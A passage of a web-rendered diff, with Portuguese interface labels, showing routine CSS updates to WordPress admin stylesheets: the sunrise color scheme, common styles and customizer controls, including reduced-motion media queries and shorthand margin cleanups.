+  background-color: #fbf0e7;
710 
+}
711 
+
712 
+.welcome-panel-header-image .about-six {
713 
+  fill: #dd823b;
714 
+}
715 
+
716 
+.welcome-panel-header-image .about-zero {
717 
+  fill: #cf4944;
718 
+}
719 
+
720 
+[class*=welcome-panel-icon] {
721 
+  background-color: #cf4944;
705 722 
 }

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/colors/sunrise/colors-rtl.min.css


+ 26 - 9
app/wp-admin/css/colors/sunrise/colors.css
Ver Arquivo 

@@ -188,7 +188,7 @@ textarea:focus {
188 188 
   color: #ccaf0b;
189 189 
 }
190 190 
 .wp-core-ui .wp-ui-text-icon {
191 
-  color: #f3f1f1;
191 
+  color: hsl(2.1582733813deg, 7%, 95%);
192 192 
 }
193 193
194 194 
 /* List tables */
 
@@ -229,7 +229,7 @@ textarea:focus {
229 229 
 }
230 230
231 231 
 #adminmenu div.wp-menu-image:before {
232 
-  color: #f3f1f1;
232 
+  color: hsl(2.1582733813deg, 7%, 95%);
233 233 
 }
234 234
235 235 
 #adminmenu a:hover,
 
@@ -341,7 +341,7 @@ ul#adminmenu > li.current > a.current:after {
341 341
342 342 
 /* Admin Menu: collapse button */
343 343 
 #collapse-button {
344 
-  color: #f3f1f1;
344 
+  color: hsl(2.1582733813deg, 7%, 95%);
345 345 
 }
346 346
347 347 
 #collapse-button:hover,
 
@@ -366,7 +366,7 @@ ul#adminmenu > li.current > a.current:after {
366 366 
 #wpadminbar .ab-icon:before,
367 367 
 #wpadminbar .ab-item:before,
368 368 
 #wpadminbar .ab-item:after {
369 
-  color: #f3f1f1;
369 
+  color: hsl(2.1582733813deg, 7%, 95%);
370 370 
 }
371 371
372 372 
 #wpadminbar:not(.mobile) .ab-top-menu > li:hover > .ab-item,
 
@@ -410,7 +410,7 @@ ul#adminmenu > li.current > a.current:after {
410 410
411 411 
 #wpadminbar .quicklinks li .blavatar,
412 412 
 #wpadminbar .menupop .menupop > .ab-item:before {
413 
-  color: #f3f1f1;
413 
+  color: hsl(2.1582733813deg, 7%, 95%);
414 414 
 }
415 415
416 416 
 #wpadminbar .quicklinks .menupop ul li a:hover,
 
@@ -445,12 +445,12 @@ ul#adminmenu > li.current > a.current:after {
445 445
446 446 
 #wpadminbar.mobile .quicklinks .hover .ab-icon:before,
447 447 
 #wpadminbar.mobile .quicklinks .hover .ab-item:before {
448 
-  color: #f3f1f1;
448 
+  color: hsl(2.1582733813deg, 7%, 95%);
449 449 
 }
450 450
451 451 
 /* Admin Bar: search */
452 452 
 #wpadminbar #adminbarsearch:before {
453 
-  color: #f3f1f1;
453 
+  color: hsl(2.1582733813deg, 7%, 95%);
454 454 
 }
455 455
456 456 
 #wpadminbar > #wp-toolbar > #wp-admin-bar-top-secondary > #wp-admin-bar-search #adminbarsearch input.adminbar-input:focus {
 
@@ -586,7 +586,7 @@ body.more-filters-opened .more-filters:focus:before {
586 586
587 587 
 /* Responsive Component */
588 588 
 div#wp-responsive-toggle a:before {
589 
-  color: #f3f1f1;
589 
+  color: hsl(2.1582733813deg, 7%, 95%);
590 590 
 }
591 591
592 592 
 .wp-responsive-open div#wp-responsive-toggle a {
 
@@ -599,7 +599,7 @@ div#wp-responsive-toggle a:before {
599 599 
 }
600 600
601 601 
 .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before {
602 
-  color: #f3f1f1;
602 
+  color: hsl(2.1582733813deg, 7%, 95%);
603 603 
 }
604 604
605 605 
 /* TinyMCE */
 
@@ -702,4 +702,21 @@ div#wp-responsive-toggle a:before {
702 702 
 .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover {
703 703 
   border-bottom-color: #dd823b;
704 704 
   color: #0073aa;
705 
+}
706 
+
707 
+/* Welcome Panel */
708 
+.welcome-panel {
709 
+  background-color: #fbf0e7;
710 
+}
711 
+
712 
+.welcome-panel-header-image .about-six {
713 
+  fill: #dd823b;
714 
+}
715 
+
716 
+.welcome-panel-header-image .about-zero {
717 
+  fill: #cf4944;
718 
+}
719 
+
720 
+[class*=welcome-panel-icon] {
721 
+  background-color: #cf4944;
705 722 
 }

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/colors/sunrise/colors.min.css


+ 1 - 0
app/wp-admin/css/colors/sunrise/colors.scss
Ver Arquivo 

@@ -1,3 +1,4 @@
1 
+$scheme-name: "sunrise";
1 2 
 $base-color: #cf4944;
2 3 
 $highlight-color: #dd823b;
3 4 
 $notification-color: #ccaf0b;

+ 22 - 25
app/wp-admin/css/common-rtl.css
Ver Arquivo 

@@ -271,6 +271,7 @@ a:active {
271 271
272 272 
 a:focus,
273 273 
 a:focus .media-icon img,
274 
+a:focus .plugin-icon,
274 275 
 .wp-person a:focus .gravatar {
275 276 
 	color: #043959;
276 277 
 	box-shadow:
 
@@ -418,7 +419,7 @@ code {
418 419
419 420 
 kbd,
420 421 
 code {
421 
-	padding: 3px 5px 2px 5px;
422 
+	padding: 3px 5px 2px;
422 423 
 	margin: 0 1px;
423 424 
 	background: #f0f0f1;
424 425 
 	background: rgba(0, 0, 0, 0.07);
 
@@ -583,7 +584,7 @@ code {
583 584 
 	font-size: 23px;
584 585 
 	font-weight: 400;
585 586 
 	margin: 0;
586 
-	padding: 9px 0 4px 0;
587 
+	padding: 9px 0 4px;
587 588 
 	line-height: 1.3;
588 589 
 }
589 590 
 
@@ -789,7 +790,7 @@ img.emoji {
789 790 
 /* @todo can we combine these into a class or use an existing dashicon one? */
790 791 
 .welcome-panel .welcome-panel-close:before,
791 792 
 .tagchecklist .ntdelbutton .remove-tag-icon:before,
792 
-#bulk-titles div a:before,
793 
+#bulk-titles .ntdelbutton:before,
793 794 
 .notice-dismiss:before {
794 795 
 	background: none;
795 796 
 	color: #787c82;
 
@@ -808,10 +809,6 @@ img.emoji {
808 809 
 	margin: 0;
809 810 
 }
810 811
811 
-#bulk-titles div a:before {
812 
-	margin: 1px 0;
813 
-}
814 
-
815 812 
 .tagchecklist .ntdelbutton .remove-tag-icon:before {
816 813 
 	margin-right: 2px;
817 814 
 	border-radius: 50%;
 
@@ -824,12 +821,10 @@ img.emoji {
824 821 
 	outline: 0;
825 822 
 }
826 823
827 
-.welcome-panel .welcome-panel-close:hover:before,
828 
-.welcome-panel .welcome-panel-close:focus:before,
829 824 
 .tagchecklist .ntdelbutton:hover .remove-tag-icon:before,
830 825 
 .tagchecklist .ntdelbutton:focus .remove-tag-icon:before,
831 
-#bulk-titles div a:hover:before,
832 
-#bulk-titles div a:focus:before {
826 
+#bulk-titles .ntdelbutton:hover:before,
827 
+#bulk-titles .ntdelbutton:focus:before {
833 828 
 	color: #d63638;
834 829 
 }
835 830 
 
@@ -884,7 +879,8 @@ hr {
884 879 
 #media-items a.delete-permanently,
885 880 
 #nav-menu-footer .menu-delete,
886 881 
 #delete-link a.delete,
887 
-a#remove-post-thumbnail {
882 
+a#remove-post-thumbnail,
883 
+.privacy_requests .remove-personal-data .remove-personal-data-handle {
888 884 
 	color: #b32d2e;
889 885 
 }
890 886 
 
@@ -902,7 +898,8 @@ span.required,
902 898 
 #media-items a.delete-permanently:hover,
903 899 
 #nav-menu-footer .menu-delete:hover,
904 900 
 #delete-link a.delete:hover,
905 
-a#remove-post-thumbnail:hover {
901 
+a#remove-post-thumbnail:hover,
902 
+.privacy_requests .remove-personal-data .remove-personal-data-handle:hover {
906 903 
 	color: #b32d2e;
907 904 
 	border: none;
908 905 
 }
 
@@ -958,7 +955,7 @@ a#remove-post-thumbnail:hover {
958 955 
 }
959 956
960 957 
 #minor-publishing-actions {
961 
-	padding: 10px 10px 0 10px;
958 
+	padding: 10px 10px 0;
962 959 
 	text-align: left;
963 960 
 }
964 961 
 
@@ -1233,7 +1230,7 @@ th.action-links {
1233 1230
1234 1231 
 .filter-group .filter-group-feature label {
1235 1232 
 	display: block;
1236 
-	margin: 14px 23px 14px 0px;
1233 
+	margin: 14px 23px 14px 0;
1237 1234 
 }
1238 1235
1239 1236 
 .filter-drawer .buttons {
 
@@ -1610,7 +1607,7 @@ form.upgrade {
1610 1607 
 form.upgrade .hint {
1611 1608 
 	font-style: italic;
1612 1609 
 	font-size: 85%;
1613 
-	margin: -0.5em 0 2em 0;
1610 
+	margin: -0.5em 0 2em;
1614 1611 
 }
1615 1612
1616 1613 
 .update-php .spinner {
 
@@ -1708,7 +1705,7 @@ p.auto-update-status {
1708 1705 
 /* screen options and help tabs revert */
1709 1706 
 #screen-meta {
1710 1707 
 	display: none;
1711 
-	margin: 0 0px -1px 20px;
1708 
+	margin: 0 0 -1px 20px;
1712 1709 
 	position: relative;
1713 1710 
 	background-color: #fff;
1714 1711 
 	border: 1px solid #c3c4c7;
 
@@ -1838,6 +1835,7 @@ p.auto-update-status {
1838 1835
1839 1836 
 .metabox-prefs .screen-options .screen-per-page {
1840 1837 
 	margin-left: 15px;
1838 
+	padding-left: 0;
1841 1839 
 }
1842 1840
1843 1841 
 .metabox-prefs .screen-options label {
 
@@ -3144,7 +3142,7 @@ img {
3144 3142 
 	width: 300px;
3145 3143 
 }
3146 3144
3147 
-/* Theme/Plugin Editor */
3145 
+/* Theme/Plugin file editor */
3148 3146 
 .alignleft h2 {
3149 3147 
 	margin: 0;
3150 3148 
 }
 
@@ -3153,7 +3151,6 @@ img {
3153 3151 
 	font-family: Consolas, Monaco, monospace;
3154 3152 
 	font-size: 13px;
3155 3153 
 	background: #f6f7f7;
3156 
-	-moz-tab-size: 4;
3157 3154 
 	-o-tab-size: 4;
3158 3155 
 	tab-size: 4;
3159 3156 
 }
 
@@ -3197,7 +3194,7 @@ img {
3197 3194 
 }
3198 3195
3199 3196 
 /*
3200 
- * Styles for Theme and Plugin editors.
3197 
+ * Styles for Theme and Plugin file editors.
3201 3198 
  */
3202 3199
3203 3200 
 /* Hide collapsed items. */
 
@@ -3286,7 +3283,7 @@ img {
3286 3283 
 .tree-folder > .current-file::before {
3287 3284 
 	right: 4px;
3288 3285 
 	height: 15px;
3289 
-	width: 0px;
3286 
+	width: 0;
3290 3287 
 	border-right: none;
3291 3288 
 	top: 3px;
3292 3289 
 }
 
@@ -3381,7 +3378,7 @@ img {
3381 3378 
 }
3382 3379
3383 3380 
 #templateside li.howto {
3384 
-	padding: 6px 12px 12px 12px;
3381 
+	padding: 6px 12px 12px;
3385 3382 
 }
3386 3383
3387 3384 
 .theme-editor-php .highlight {
 
@@ -3433,7 +3430,7 @@ img {
3433 3430 
 }
3434 3431
3435 3432 
 .widget-top .widget-action .toggle-indicator:before {
3436 
-	padding: 1px 0px 1px 2px;
3433 
+	padding: 1px 0 1px 2px;
3437 3434 
 	border-radius: 50%;
3438 3435 
 }
3439 3436 
 
@@ -3828,7 +3825,7 @@ img {
3828 3825 
 	.wrap div.updated,
3829 3826 
 	.wrap div.error,
3830 3827 
 	.media-upload-form div.error {
3831 
-		margin: 20px 0 10px 0;
3828 
+		margin: 20px 0 10px;
3832 3829 
 		padding: 5px 10px;
3833 3830 
 		font-size: 14px;
3834 3831 
 		line-height: 175%;
 
@@ -3938,7 +3935,7 @@ img {
3938 3935 
 		right: -8px;
3939 3936 
 	}
3940 3937 
 	.tree-folder > li::before {
3941 
-		top: 0px;
3938 
+		top: 0;
3942 3939 
 		height: 13px;
3943 3940 
 	}
3944 3941 
 	.tree-folder > .current-file::before {

Diferenças do arquivo suprimidas por serem muito extensas
+ 2 - 2
app/wp-admin/css/common-rtl.min.css


+ 22 - 25
app/wp-admin/css/common.css
Ver Arquivo 

@@ -270,6 +270,7 @@ a:active {
270 270
271 271 
 a:focus,
272 272 
 a:focus .media-icon img,
273 
+a:focus .plugin-icon,
273 274 
 .wp-person a:focus .gravatar {
274 275 
 	color: #043959;
275 276 
 	box-shadow:
 
@@ -417,7 +418,7 @@ code {
417 418
418 419 
 kbd,
419 420 
 code {
420 
-	padding: 3px 5px 2px 5px;
421 
+	padding: 3px 5px 2px;
421 422 
 	margin: 0 1px;
422 423 
 	background: #f0f0f1;
423 424 
 	background: rgba(0, 0, 0, 0.07);
 
@@ -582,7 +583,7 @@ code {
582 583 
 	font-size: 23px;
583 584 
 	font-weight: 400;
584 585 
 	margin: 0;
585 
-	padding: 9px 0 4px 0;
586 
+	padding: 9px 0 4px;
586 587 
 	line-height: 1.3;
587 588 
 }
588 589 
 
@@ -788,7 +789,7 @@ img.emoji {
788 789 
 /* @todo can we combine these into a class or use an existing dashicon one? */
789 790 
 .welcome-panel .welcome-panel-close:before,
790 791 
 .tagchecklist .ntdelbutton .remove-tag-icon:before,
791 
-#bulk-titles div a:before,
792 
+#bulk-titles .ntdelbutton:before,
792 793 
 .notice-dismiss:before {
793 794 
 	background: none;
794 795 
 	color: #787c82;
 
@@ -807,10 +808,6 @@ img.emoji {
807 808 
 	margin: 0;
808 809 
 }
809 810
810 
-#bulk-titles div a:before {
811 
-	margin: 1px 0;
812 
-}
813 
-
814 811 
 .tagchecklist .ntdelbutton .remove-tag-icon:before {
815 812 
 	margin-left: 2px;
816 813 
 	border-radius: 50%;
 
@@ -823,12 +820,10 @@ img.emoji {
823 820 
 	outline: 0;
824 821 
 }
825 822
826 
-.welcome-panel .welcome-panel-close:hover:before,
827 
-.welcome-panel .welcome-panel-close:focus:before,
828 823 
 .tagchecklist .ntdelbutton:hover .remove-tag-icon:before,
829 824 
 .tagchecklist .ntdelbutton:focus .remove-tag-icon:before,
830 
-#bulk-titles div a:hover:before,
831 
-#bulk-titles div a:focus:before {
825 
+#bulk-titles .ntdelbutton:hover:before,
826 
+#bulk-titles .ntdelbutton:focus:before {
832 827 
 	color: #d63638;
833 828 
 }
834 829 
 
@@ -883,7 +878,8 @@ hr {
883 878 
 #media-items a.delete-permanently,
884 879 
 #nav-menu-footer .menu-delete,
885 880 
 #delete-link a.delete,
886 
-a#remove-post-thumbnail {
881 
+a#remove-post-thumbnail,
882 
+.privacy_requests .remove-personal-data .remove-personal-data-handle {
887 883 
 	color: #b32d2e;
888 884 
 }
889 885 
 
@@ -901,7 +897,8 @@ span.required,
901 897 
 #media-items a.delete-permanently:hover,
902 898 
 #nav-menu-footer .menu-delete:hover,
903 899 
 #delete-link a.delete:hover,
904 
-a#remove-post-thumbnail:hover {
900 
+a#remove-post-thumbnail:hover,
901 
+.privacy_requests .remove-personal-data .remove-personal-data-handle:hover {
905 902 
 	color: #b32d2e;
906 903 
 	border: none;
907 904 
 }
 
@@ -957,7 +954,7 @@ a#remove-post-thumbnail:hover {
957 954 
 }
958 955
959 956 
 #minor-publishing-actions {
960 
-	padding: 10px 10px 0 10px;
957 
+	padding: 10px 10px 0;
961 958 
 	text-align: right;
962 959 
 }
963 960 
 
@@ -1232,7 +1229,7 @@ th.action-links {
1232 1229
1233 1230 
 .filter-group .filter-group-feature label {
1234 1231 
 	display: block;
1235 
-	margin: 14px 0px 14px 23px;
1232 
+	margin: 14px 0 14px 23px;
1236 1233 
 }
1237 1234
1238 1235 
 .filter-drawer .buttons {
 
@@ -1609,7 +1606,7 @@ form.upgrade {
1609 1606 
 form.upgrade .hint {
1610 1607 
 	font-style: italic;
1611 1608 
 	font-size: 85%;
1612 
-	margin: -0.5em 0 2em 0;
1609 
+	margin: -0.5em 0 2em;
1613 1610 
 }
1614 1611
1615 1612 
 .update-php .spinner {
 
@@ -1707,7 +1704,7 @@ p.auto-update-status {
1707 1704 
 /* screen options and help tabs revert */
1708 1705 
 #screen-meta {
1709 1706 
 	display: none;
1710 
-	margin: 0 20px -1px 0px;
1707 
+	margin: 0 20px -1px 0;
1711 1708 
 	position: relative;
1712 1709 
 	background-color: #fff;
1713 1710 
 	border: 1px solid #c3c4c7;
 
@@ -1837,6 +1834,7 @@ p.auto-update-status {
1837 1834
1838 1835 
 .metabox-prefs .screen-options .screen-per-page {
1839 1836 
 	margin-right: 15px;
1837 
+	padding-right: 0;
1840 1838 
 }
1841 1839
1842 1840 
 .metabox-prefs .screen-options label {
 
@@ -3143,7 +3141,7 @@ img {
3143 3141 
 	width: 300px;
3144 3142 
 }
3145 3143
3146 
-/* Theme/Plugin Editor */
3144 
+/* Theme/Plugin file editor */
3147 3145 
 .alignleft h2 {
3148 3146 
 	margin: 0;
3149 3147 
 }
 
@@ -3152,7 +3150,6 @@ img {
3152 3150 
 	font-family: Consolas, Monaco, monospace;
3153 3151 
 	font-size: 13px;
3154 3152 
 	background: #f6f7f7;
3155 
-	-moz-tab-size: 4;
3156 3153 
 	-o-tab-size: 4;
3157 3154 
 	tab-size: 4;
3158 3155 
 }
 
@@ -3196,7 +3193,7 @@ img {
3196 3193 
 }
3197 3194
3198 3195 
 /*
3199 
- * Styles for Theme and Plugin editors.
3196 
+ * Styles for Theme and Plugin file editors.
3200 3197 
  */
3201 3198
3202 3199 
 /* Hide collapsed items. */
 
@@ -3285,7 +3282,7 @@ img {
3285 3282 
 .tree-folder > .current-file::before {
3286 3283 
 	left: 4px;
3287 3284 
 	height: 15px;
3288 
-	width: 0px;
3285 
+	width: 0;
3289 3286 
 	border-left: none;
3290 3287 
 	top: 3px;
3291 3288 
 }
 
@@ -3380,7 +3377,7 @@ img {
3380 3377 
 }
3381 3378
3382 3379 
 #templateside li.howto {
3383 
-	padding: 6px 12px 12px 12px;
3380 
+	padding: 6px 12px 12px;
3384 3381 
 }
3385 3382
3386 3383 
 .theme-editor-php .highlight {
 
@@ -3432,7 +3429,7 @@ img {
3432 3429 
 }
3433 3430
3434 3431 
 .widget-top .widget-action .toggle-indicator:before {
3435 
-	padding: 1px 2px 1px 0px;
3432 
+	padding: 1px 2px 1px 0;
3436 3433 
 	border-radius: 50%;
3437 3434 
 }
3438 3435 
 
@@ -3827,7 +3824,7 @@ img {
3827 3824 
 	.wrap div.updated,
3828 3825 
 	.wrap div.error,
3829 3826 
 	.media-upload-form div.error {
3830 
-		margin: 20px 0 10px 0;
3827 
+		margin: 20px 0 10px;
3831 3828 
 		padding: 5px 10px;
3832 3829 
 		font-size: 14px;
3833 3830 
 		line-height: 175%;
 
@@ -3937,7 +3934,7 @@ img {
3937 3934 
 		left: -8px;
3938 3935 
 	}
3939 3936 
 	.tree-folder > li::before {
3940 
-		top: 0px;
3937 
+		top: 0;
3941 3938 
 		height: 13px;
3942 3939 
 	}
3943 3940 
 	.tree-folder > .current-file::before {

Diferenças do arquivo suprimidas por serem muito extensas
+ 2 - 2
app/wp-admin/css/common.min.css


+ 54 - 15
app/wp-admin/css/customize-controls-rtl.css
Ver Arquivo 

@@ -106,6 +106,12 @@ body:not(.ready) #customize-save-button-wrapper .save {
106 106 
 	height: 100%;
107 107 
 }
108 108
109 
+@media (prefers-reduced-motion: reduce) {
110 
+	#customize-sidebar-outer-content {
111 
+		transition: none;
112 
+	}
113 
+}
114 
+
109 115 
 #customize-theme-controls .control-section-outer {
110 116 
 	display: none !important;
111 117 
 }
 
@@ -124,6 +130,12 @@ body:not(.ready) #customize-save-button-wrapper .save {
124 130 
 	transition: right .18s;
125 131 
 }
126 132
133 
+@media (prefers-reduced-motion: reduce) {
134 
+	.outer-section-open .wp-full-overlay.expanded #customize-sidebar-outer-content {
135 
+		transition: none;
136 
+	}
137 
+}
138 
+
127 139 
 .customize-outer-pane-parent {
128 140 
 	margin: 0;
129 141 
 }
 
@@ -538,6 +550,13 @@ body.trashing #publish-settings {
538 550 
 		.15s border-color ease-in-out;
539 551 
 }
540 552
553 
+@media (prefers-reduced-motion: reduce) {
554 
+	#customize-theme-controls .accordion-section-title,
555 
+	#customize-outer-theme-controls .accordion-section-title {
556 
+		transition: none;
557 
+	}
558 
+}
559 
+
541 560 
 #customize-controls #customize-theme-controls .customize-themes-panel .accordion-section-title {
542 561 
 	color: #50575e;
543 562 
 	background-color: #fff;
 
@@ -636,6 +655,14 @@ body.trashing #publish-settings {
636 655 
 	transition: 0.18s transform cubic-bezier(0.645, 0.045, 0.355, 1); /* easeInOutCubic */
637 656 
 }
638 657
658 
+@media (prefers-reduced-motion: reduce) {
659 
+	#customize-info,
660 
+	#customize-theme-controls .customize-pane-parent,
661 
+	#customize-theme-controls .customize-pane-child {
662 
+		transition: none;
663 
+	}
664 
+}
665 
+
639 666 
 #customize-theme-controls .customize-pane-child.skip-transition {
640 667 
 	transition: none;
641 668 
 }
 
@@ -717,7 +744,7 @@ body.trashing #publish-settings {
717 744 
 }
718 745
719 746 
 .customize-section-title {
720 
-	margin: -12px -12px 0 -12px;
747 
+	margin: -12px -12px 0;
721 748 
 	border-bottom: 1px solid #dcdcde;
722 749 
 	background: #fff;
723 750 
 }
 
@@ -740,11 +767,11 @@ div.customize-section-description p:last-child {
740 767
741 768 
 #customize-theme-controls .customize-themes-panel h3.customize-section-title:first-child {
742 769 
 	border-bottom: 1px solid #dcdcde;
743 
-	padding: 12px 12px 12px 12px;
770 
+	padding: 12px;
744 771 
 }
745 772
746 773 
 .ios #customize-theme-controls .customize-themes-panel h3.customize-section-title:first-child {
747 
-	padding: 12px 12px 13px 12px;
774 
+	padding: 12px 12px 13px;
748 775 
 }
749 776
750 777 
 .customize-section-title h3,
 
@@ -923,7 +950,8 @@ p.customize-section-description {
923 950 
 .customize-control input[type="number"],
924 951 
 .customize-control input[type="search"],
925 952 
 .customize-control input[type="tel"],
926 
-.customize-control input[type="url"] {
953 
+.customize-control input[type="url"],
954 
+.customize-control input[type="range"] {
927 955 
 	width: 100%;
928 956 
 	margin: 0;
929 957 
 }
 
@@ -963,7 +991,7 @@ p.customize-section-description {
963 991
964 992 
 .customize-section-description a.external-link:after {
965 993 
 	font: 16px/11px dashicons;
966 
-	content: "\f310";
994 
+	content: "\f504";
967 995 
 	top: 3px;
968 996 
 	position: relative;
969 997 
 	padding-right: 3px;
 
@@ -1114,7 +1142,7 @@ p.customize-section-description {
1114 1142 
  */
1115 1143
1116 1144 
 #customize-controls .customize-control-notifications-container { /* Scoped to #customize-controls for specificity over notification styles in common.css. */
1117 
-	margin: 4px 0 8px 0;
1145 
+	margin: 4px 0 8px;
1118 1146 
 	padding: 0;
1119 1147 
 	cursor: default;
1120 1148 
 }
 
@@ -1127,7 +1155,7 @@ p.customize-section-description {
1127 1155
1128 1156 
 #customize-controls .customize-control-notifications-container li.notice {
1129 1157 
 	list-style: none;
1130 
-	margin: 0 0 6px 0;
1158 
+	margin: 0 0 6px;
1131 1159 
 	padding: 9px 14px;
1132 1160 
 	overflow: hidden;
1133 1161 
 }
 
@@ -1429,7 +1457,7 @@ p.customize-section-description {
1429 1457 
 }
1430 1458
1431 1459 
 .customize-control-header .header-view:last-child {
1432 
-	margin-bottom: 0px;
1460 
+	margin-bottom: 0;
1433 1461 
 }
1434 1462
1435 1463 
 /* Convoluted, but 'outline' support isn't good enough yet */
 
@@ -1578,7 +1606,6 @@ p.customize-section-description {
1578 1606 
 	font-family: Consolas, Monaco, monospace;
1579 1607 
 	font-size: 12px;
1580 1608 
 	padding: 6px 8px;
1581 
-	-moz-tab-size: 2;
1582 1609 
 	-o-tab-size: 2;
1583 1610 
 	tab-size: 2;
1584 1611 
 }
 
@@ -1665,7 +1692,7 @@ p.customize-section-description {
1665 1692 
 	border-bottom: 1px solid #dcdcde;
1666 1693 
 	border-right: none;
1667 1694 
 	border-left: none;
1668 
-	margin: 0 0 15px 0;
1695 
+	margin: 0 0 15px;
1669 1696 
 	padding-left: 100px; /* Space for the button */
1670 1697 
 }
1671 1698 
 
@@ -1706,6 +1733,12 @@ p.customize-section-description {
1706 1733 
 	font-weight: 400;
1707 1734 
 }
1708 1735
1736 
+#customize-notifications-area .notification-message button.switch-to-editor {
1737 
+	display: block;
1738 
+	margin-top: 6px;
1739 
+	font-weight: 400;
1740 
+}
1741 
+
1709 1742 
 #customize-theme-controls .control-panel-themes > .accordion-section-title:after {
1710 1743 
 	display: none;
1711 1744 
 }
 
@@ -1724,6 +1757,12 @@ p.customize-section-description {
1724 1757 
 	z-index: 20;
1725 1758 
 }
1726 1759
1760 
+@media (prefers-reduced-motion: reduce) {
1761 
+	.control-panel-themes .customize-themes-full-container {
1762 
+		transition: none;
1763 
+	}
1764 
+}
1765 
+
1727 1766 
 @media screen and (min-width: 1670px) {
1728 1767 
 	.control-panel-themes .customize-themes-full-container {
1729 1768 
 		width: 82%;
 
@@ -1861,7 +1900,7 @@ p.customize-section-description {
1861 1900 
 }
1862 1901
1863 1902 
 .control-panel-themes .customize-themes-notifications .notice {
1864 
-	margin: 0 0 25px 0;
1903 
+	margin: 0 0 25px;
1865 1904 
 }
1866 1905
1867 1906 
 .customize-themes-full-container .customize-themes-section {
 
@@ -1875,7 +1914,7 @@ p.customize-section-description {
1875 1914
1876 1915 
 .control-section .customize-section-text-before {
1877 1916 
 	padding: 0 15px 8px 0;
1878 
-	margin: 15px 0 0 0;
1917 
+	margin: 15px 0 0;
1879 1918 
 	line-height: 16px;
1880 1919 
 	border-bottom: 1px solid #dcdcde;
1881 1920 
 	color: #50575e;
 
@@ -2096,7 +2135,7 @@ p.customize-section-description {
2096 2135 
 		position: relative;
2097 2136 
 		right: 0;
2098 2137 
 		width: 100%;
2099 
-		margin: 0 0 25px 0;
2138 
+		margin: 0 0 25px;
2100 2139 
 	}
2101 2140 
 	.filter-drawer {
2102 2141 
 		top: 46px;
 
@@ -2206,7 +2245,7 @@ p.customize-section-description {
2206 2245 
 		width: 26px;
2207 2246 
 		display: block;
2208 2247 
 		line-height: 2.3;
2209 
-		padding: 0 8px 0 8px;
2248 
+		padding: 0 8px;
2210 2249 
 		border-left: 1px solid #dcdcde;
2211 2250 
 	}
2212 2251 
 
@@ -2367,7 +2406,7 @@ body.cheatin h1 {
2367 2406 
 	color: #50575e;
2368 2407 
 	font-size: 24px;
2369 2408 
 	font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;
2370 
-	margin: 30px 0 0 0;
2409 
+	margin: 30px 0 0;
2371 2410 
 	padding: 0 0 7px;
2372 2411 
 }
2373 2412

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/customize-controls-rtl.min.css


+ 54 - 15
app/wp-admin/css/customize-controls.css
Ver Arquivo 

@@ -105,6 +105,12 @@ body:not(.ready) #customize-save-button-wrapper .save {
105 105 
 	height: 100%;
106 106 
 }
107 107
108 
+@media (prefers-reduced-motion: reduce) {
109 
+	#customize-sidebar-outer-content {
110 
+		transition: none;
111 
+	}
112 
+}
113 
+
108 114 
 #customize-theme-controls .control-section-outer {
109 115 
 	display: none !important;
110 116 
 }
 
@@ -123,6 +129,12 @@ body:not(.ready) #customize-save-button-wrapper .save {
123 129 
 	transition: left .18s;
124 130 
 }
125 131
132 
+@media (prefers-reduced-motion: reduce) {
133 
+	.outer-section-open .wp-full-overlay.expanded #customize-sidebar-outer-content {
134 
+		transition: none;
135 
+	}
136 
+}
137 
+
126 138 
 .customize-outer-pane-parent {
127 139 
 	margin: 0;
128 140 
 }
 
@@ -537,6 +549,13 @@ body.trashing #publish-settings {
537 549 
 		.15s border-color ease-in-out;
538 550 
 }
539 551
552 
+@media (prefers-reduced-motion: reduce) {
553 
+	#customize-theme-controls .accordion-section-title,
554 
+	#customize-outer-theme-controls .accordion-section-title {
555 
+		transition: none;
556 
+	}
557 
+}
558 
+
540 559 
 #customize-controls #customize-theme-controls .customize-themes-panel .accordion-section-title {
541 560 
 	color: #50575e;
542 561 
 	background-color: #fff;
 
@@ -635,6 +654,14 @@ body.trashing #publish-settings {
635 654 
 	transition: 0.18s transform cubic-bezier(0.645, 0.045, 0.355, 1); /* easeInOutCubic */
636 655 
 }
637 656
657 
+@media (prefers-reduced-motion: reduce) {
658 
+	#customize-info,
659 
+	#customize-theme-controls .customize-pane-parent,
660 
+	#customize-theme-controls .customize-pane-child {
661 
+		transition: none;
662 
+	}
663 
+}
664 
+
638 665 
 #customize-theme-controls .customize-pane-child.skip-transition {
639 666 
 	transition: none;
640 667 
 }
 
@@ -716,7 +743,7 @@ body.trashing #publish-settings {
716 743 
 }
717 744
718 745 
 .customize-section-title {
719 
-	margin: -12px -12px 0 -12px;
746 
+	margin: -12px -12px 0;
720 747 
 	border-bottom: 1px solid #dcdcde;
721 748 
 	background: #fff;
722 749 
 }
 
@@ -739,11 +766,11 @@ div.customize-section-description p:last-child {
739 766
740 767 
 #customize-theme-controls .customize-themes-panel h3.customize-section-title:first-child {
741 768 
 	border-bottom: 1px solid #dcdcde;
742 
-	padding: 12px 12px 12px 12px;
769 
+	padding: 12px;
743 770 
 }
744 771
745 772 
 .ios #customize-theme-controls .customize-themes-panel h3.customize-section-title:first-child {
746 
-	padding: 12px 12px 13px 12px;
773 
+	padding: 12px 12px 13px;
747 774 
 }
748 775
749 776 
 .customize-section-title h3,
 
@@ -922,7 +949,8 @@ p.customize-section-description {
922 949 
 .customize-control input[type="number"],
923 950 
 .customize-control input[type="search"],
924 951 
 .customize-control input[type="tel"],
925 
-.customize-control input[type="url"] {
952 
+.customize-control input[type="url"],
953 
+.customize-control input[type="range"] {
926 954 
 	width: 100%;
927 955 
 	margin: 0;
928 956 
 }
 
@@ -962,7 +990,7 @@ p.customize-section-description {
962 990
963 991 
 .customize-section-description a.external-link:after {
964 992 
 	font: 16px/11px dashicons;
965 
-	content: "\f310";
993 
+	content: "\f504";
966 994 
 	top: 3px;
967 995 
 	position: relative;
968 996 
 	padding-left: 3px;
 
@@ -1113,7 +1141,7 @@ p.customize-section-description {
